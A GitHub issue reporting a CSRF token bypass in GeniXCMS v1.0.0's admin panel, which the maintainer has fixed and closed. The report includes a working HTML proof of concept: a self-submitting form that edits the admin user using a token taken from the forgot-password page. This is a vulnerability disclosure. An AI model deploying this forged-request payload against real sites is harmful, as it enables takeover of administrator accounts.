Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSRF in background management of v1.0.0(latest version) discovered by "ADLab of Venustech" #70

Closed
superfish9 opened this issue Feb 9, 2017 · 0 comments
Assignees
Labels

Comments

@superfish9
Copy link

GeniXCMS implement token to defend CSRF in background management webpage. An attacker is able to bypass the defense as follows:
First, visit the forgotpassword.php page and grab a token, which can be used to launch a CSRF attack:
wx20170209-154200 2x
Then, use the following PoC(The token used following is in another test.):

<html>
<head>
<title>csrf</title>
</head>
<body>
<form id="csrf" action="http://192.168.246.151/genixcms100/gxadmin/index.php?page=users&act=edit&id=1" method="post">
<input name="edituser" value="" />
<input name="userid" value="sfishtest" />
<input name="email" value="sfish@test.com" />
<input name="pass" value="" />
<input name="group" value="0" />
<input name="token" value="S2irBryibAsjAXfhUFwktRtrbwAVoC2ofIKej8Zp5C6r9f0QBPiJ9sbdnHNOC88oT4MqfI59zv3TIRMH" />
</form>
<script>
document.getElementById("csrf").submit();
</script>
</body>
</html>

Finally, the response demonstrated that the token is valid:
wx20170209-154122 2x
Thus, we bypass the defense against CSRF, and is able to add an admin account of GeniXCMS.

@semplon semplon self-assigned this Feb 10, 2017
@superfish9 superfish9 changed the title CSRF in background management of v1.0.0(latest version) CSRF in background management of v1.0.0(latest version) discovered by ADLab of Venustech Feb 11, 2017
@superfish9 superfish9 changed the title CSRF in background management of v1.0.0(latest version) discovered by ADLab of Venustech CSRF in background management of v1.0.0(latest version) discovered by "ADLab of Venustech" Feb 11, 2017
semplon pushed a commit that referenced this issue Feb 12, 2017
@semplon semplon closed this as completed Feb 12, 2017
semplon pushed a commit that referenced this issue Feb 12, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants